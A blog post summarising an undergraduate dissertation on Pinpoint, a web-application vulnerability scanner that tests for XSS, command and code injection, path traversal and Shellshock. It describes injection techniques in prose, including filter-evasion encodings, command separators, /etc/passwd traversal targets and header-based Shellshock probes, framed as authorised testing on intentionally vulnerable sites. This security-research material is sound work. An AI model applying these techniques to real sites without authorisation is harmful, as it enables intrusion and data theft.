Presenting: Pinpoint
A Web Application Vulnerability Scanner.
My full dissertation is available here.
Web-applications are often subject to attacks from hackers for a variety of reasons, from gathering data stored by the website to replacing files served with malicious ones. There is a large range of well-known vulnerabilities in web-applications that can be used to attack a site, and it is vital that these are detected before they are exploited. In my undergraduate dissertation, I created Pinpoint: a web-application vulnerability scanner for automated detection and reporting of common website vulnerabilities.
Design
The Object Oriented Approach
The main focus for my scanner was extensibility. By enabling easier extensions to the scanner, more vulnerability tests can be easily added and the scanner can have a larger scope. Using OOP makes this much easier, as the core scanner can be designed to interact with abstract Exploits and VulnReports, while the specific vulnerabilities simply have to implement these classes. A small amount of code being added to the core of the scanner adds this functionality in a very simple way, due to the OO approach.
Exploration
The core of any scanner is a crawler: a program to systematically visit all pages of a website and grab the required information. In this case, the crawler will be gathering all of the possible inputs to the site - all fillable forms and parameters pased via the URL - as we will be testing each of these for vulnerabilities. This information can be neatly wrapped up in Locator
objects, fitting with our overall object-oriented approach.
Fingerprinting
Fingerprinting allows us to reduce the amount of work required to detect vulnerabilities by identifying information about the site.
One useful piece of information is the operating system of the web server. Many payloads, especially with command injection and the UNIX-specific shellshock vulnerability, will only work on certain OSes, and identifying which OS we are targeting allows these platform specific attacks to be skipped. OS fingerprinting can be done through a variety of methods, but bay far the easiest is banner grabbing. In this method, we request the headers of the website, then look through them for information about the OS. It is likely that the server
header will declare this information, for example server: Apache (Ubuntu)
allows us to identify a Linux server and ignore all Windows specific attacks.
Some vulnerabilities require specific behaviour from a site to be able to function. For example, XSS attacks rely on user input appearing on the website after being sent, and so we can add a simple test request which discovers the fields reflected to the website. This avoids testing any inputs which do not reflect input back to the user.
Exploitation and report(ation)
Each vulnerability tested for by Pinpoint has a dedicated Exploit
module. In general, these test for the presence of a vulnerability by submitting test strings to the inputs discovered during exploration, attempting to trigger the vulnerability is some benign way. The module then checks if the vulnerability was exploited: this could be part of the response, a metric such as time taken, or an event triggered inside of a browser instance. Any vulnerabilities discovered will generate an associated VulnReport
object, which encapsulates the relevant information and will print out a report when Pinpoint terminates.
Meet the vulnerabilities
Cross Site Scripting (XSS)
XSS is a vulnerability allowing an attacker to provide arbitrary JavaScript to a web page which is then be served to unsuspecting visitors of the page and run in their browser. It can be used to steal cookies, run keyloggers and phishing attacks in the browser, or launch further attacks through dedicated XSS frameworks.
There are three main variants of this vulnerability: reflected XSS, stored (or “persistent”) XSS, and DOM XSS.
In reflected XSS, an HTTP request causes JavaScript to be run on the resulting page. Commonly, malicious Javascript will be obfuscated, added to a URL as part of a GET request, and sent to users in a phishing attack. This can occur whenever a user supplied value appears unfiltered, or improperly filtered, in the resulting page.
In persistent XSS, JavaScript can be submitted to a page which is stored on the website indefinitely. Any user visiting the page unknowingly runs the malicious code, which makes this a more dangerous form of XSS. This is possible anywhere unfiltered input is stored and later shown on a site — common examples are comment or review forms.
In DOM XSS, the malicious code is not part of the raw HTML of our page, but instead is loaded into the DOM at parse time - for example, JavaScript can be included in the URL, and if the code that runs as a result evaluates document.URL at run-time, the malicious code will be executed without it appearing on the page. This is a niche method for exploiting XSS and nowadays is prevented by the browser, and so I have not implemented detection of DOM XSS within Pinpoint.
Pinpoint detects XSS by attempting to inject a Javascript alert
into the page. A browser instance is then able to see the alert and any text in it, which can be used to confirm the presence of a vulnerability. To avoid false positives, Pinpoint will set the alert text to a new UUID4 for each test that it runs, ensuring any alert seen is a result of the current test.
Alerts on their own are unlikely to trigger, and so we should attempt to inject HTML into the page which will trigger the alert. There are many, many ways of achieving this, and Pinpoint uses a small subset of these, including <script>
tags, injection through images and SVGs, and an XSS polygot which should execute in many different contexts.
Our payload may be rendered into the HTML, but not in a place that is useful - it may be surrounded by quotes, or a CSS block instead of HTML. We can prefix our payload with a variety of escapes to try and inject our payload outside of the restricted place that it is reflected into.
We may also face some less-than-perfect filtering in place against XSS. Although proper XSS prevention is available in many systems, such as PHP's htmlspecialchars
, some sites will attempt to filter out XSS themselves. We can try to evade this filtering by encoding our payload, such as by using variations of URL encoding or character encodings like base64.
Command Injection
There are various situations in which it is easier to use a command line tool than to implement some functionality in a program. For example, the easiest way to check if a website is up is to call
ping www.mywebsite.com
and see if there is a response. Many programming languages provide means to run command line tools, through calls such as system(”command”)
, exec(”command”)
or
command
. This is a useful feature, but poses a security vulnerability if any user supplied input is given to this command, as it becomes possible for a user to run their own commands through
the server. This vulnerability is command injection.
Pinpoint uses two methods to detect command injection: web request injection, and timeout injection. In the first case, we will gather our public IP and attempt to make the website send a web request to a local webserver. A hit on our server containing the unique test UUID will confirm the presence of a vulnerability. This won't work if we are behind a NAT, as the request will not make it to our machine (without setting up portforwarding). The alternative detection method is then timeout injection, in which we force the server to sleep for several seconds before replying to our request. A significantly slower response time than initially tested for will indicate a vulnerability. This method can lead to more false positives, as network traffic or server load impacts the response time, and so tests are repeated to demonstrate a consistent slowdown from our payloads.
We will exploit command injection differently on UNIX and Windows systems, due to the difference in shell language that we will be injection. On UNIX, we are most likely to be using Bash, whereas Windows will use CMD or Powershell. While some payloads will be OS agnostic (such as those using universal command line tools like curl or wget), we will have to vary the payloads we use in other cases, such as sleep
vs timeout
. We may also have additional payloads that we can use on some platforms, such as Invoke-WebRequest within powershell.
As with XSS, we may want to encode our payload to execute commands in certain environments. We can use a variety of command separators such as ||
, &&
, and newlines to attempt to separate our command from the command our payload is attached to. We can also wrap the command in syntax to execute it inside of the other command, such as backticks or $(payload)
.
Code Injection
Similarly to command injection, it might be useful to dynamically evaluate some code at runtime. Programming languages have functions such as eval
to do this - however if user input is part of the code being evaluated, it is possible to inject code into the system. There are also additional vulnerabilities in specific languages - for example, one of the two versions of Perl's open
function will use the command line, and pipe the result into the file handler. This allows code to be injected into the file path, and executed through Perl.
Code injection could be detected by writing a semi-complex payload in each language you aim to detect an injection into, however it is generally easier to escalate code injection to command injection. This can be easily accompished by using system
, exec
and similar functions present in many programming languages, followed by the same tests as in command injection. In hindsight, it would make more sense to combine code and command injection scanning and avoid trying to distinguish them, however as this is a dissertation project with specific goals that must be achieved separately I have kept these as two separate modules for now.
Path Traversal
Websites sometimes provide an interface to access different files on the website to allow users to browse directories of uploaded files, for example. However, if the proper restrictions are not in place, a user can escape the chosen directory and traverse the full file system of the web server. This is known as path traversal, and it can lead to various information being leaked and sensitive files accessed.
We can detect path traversal by searching for world-readable files in standard locations: on UNIX, this is /etc/passwd, and on Windows I have chosen boot.ini. We can then use regular expressions to match on the format of these specific files to see if we have managed to open them. Our payloads will be these file paths, prefixed with various ways of going up a directory (UNIX has the shortcut of being able to start a path with /, but if this fails then repeated ../'s are used).
Some paths may be filtered, and so we can use URL encoding to attempt to get around this. There are variations on URL encoding we can also use, such as double URL encoding (%252e -> %2e -> ') or alterate versions of characters from abusing unicode (%2e = %c0ae = %e080ae = %f08080ae).
Shellshock
ShellShock is a vulnerability in old versions of Bash in which a user defined environment variable can be used to run arbitrary commands. When a new instance of Bash is created, Bash looks through the table of environment variables for any encoded scripts, creates a command that defines these scripts and then runs the command. In CVE-2014-6271, it was discovered that any trailing strings after a function defined in an environment variable are executed when Bash parses the environment variable table. As such, anyone with the ability to define environment variables could run arbitrary code on the server. Even though this is an old vulnerability, it can still be found on some IoT devices nowadays, and it is still worth checking for.
Shellshock is exploited slightly differently to other vulnerabilities targeted by Pinpoint: instead of using form submission, Shellshock payloads are injected into the headers of certain pages of a site. This includes the cookie, user agent, and referer, although it is sometimes also possible to defined additional non-standardised headers to inject into. Shellshock can be used to run any command, but the simplest one to detect is just an echo which will add a new header to the HTTP response. By using a UUID as the new header name and the parameter we injected into as the value, we can guarantee no false positives when looking for cases of Shellshock.
Performance
Overall, Pinpoint performs well, finding a large number of vulnerabilities across a range of test vulnerable websites. The most notable statistics from the evalution of this project were finding all code injection, path traversal, and shellshock vulnerabilities on the tested sites, as well as an f-measure of 0.983 for command injection. Unfortunately, the XSS performance is much worse, achieving only 0.591 as the f-measure. Although this XSS performance is comparable to other many-vulnerability scanners such as ZAProxy, it falls behind W3AF, and far behind any specialised XSS scanner. Given the scope of this project, this is acceptable, although it suggests that the XSS module should likely be reworked in the future.
There are some points worth mentioning about the statistics for these tests:
- There are far more XSS cases present on these sites than other vulnerabilities. There were 181 XSS vulnerabilities, 30 command injections, 4 code injections,7 path traversals and 4 shellshock instances. This makes the XSS statistics more reliable than the others, although e.g. shellshock does cover all of the ways a system can be vulnerable, despite the miniscule number of tests.
- These test sites are all intentionally made vulnerable, and these statistics may not properly reflect performance on live websites. On the other hand, for compliance with the computer misuse act, I can only test on sites I am authorised to, and it is easier to host intentionally vulnerable sites running in VMs than to find live sites willing to let me run new software on them.
- As these sites are running in Linux VMs, there is no proper performance comparison between Linux and Windows systems. This is mostly impactful for the command injection and path traversal cases, where different tests would be run on different operating systems - although I have not been able to properly test the Windows cases.
In summary
The project was an overall success. All of the success criteria were achieved: develop a site crawler, XSS and command injection scanners, and report the vulnerabilities. Furthermore, three of six planned extensions were implemented: code injection, path traversal, and ShellShock scanners. I consider the high performance of the latter four tests to be a great success for the project, although the XSS scanner falls behind.
There are various changes I would make in hindsight:
- I would have spent more time researching a browser framework to use. I chose Selenium due to my prior experience with it, but this is far from what Selenium is designed for and there are various issues in the project from this choice.
- Existing scanners rarely differentiate between command and code injection, and indeed my method of detecting code injection is to escalate to command injection. As such, it would likely be better to combine the two types of attack in the future, putting all of the code injection payloads into the command injection module.
- The XSS scanner should use a different method for detecting vulnerabilities. Although the browser alert approach works, the performance is far worse than other scanners, and using a method from a specialised scanner would have been a better choice.
The system has been designed for extensibility, and hence new vulnerability tests could easily be added to it in the future for vulnerabilities such as SQL injection and XML injection. The additional tests could make this scanner more comparable to existing scanners, which commonly tests for tens of vulnerabilities rather than 5. Improvements could also be made to the scanner core: it is currently barely parallelised, and running tests in parallel would enable a large speedup in the scanner’s operation. Furthermore, converting to a different browser framework would allow for a higher XSS discovery rate, and making a crawler that uses a headless browser would also allow for the project to be adaptable to more modern JavaScript heavy sites.
Overall, I'm quite happy with how this turned out, and 68/100 is a pretty good grade for a dissertation :)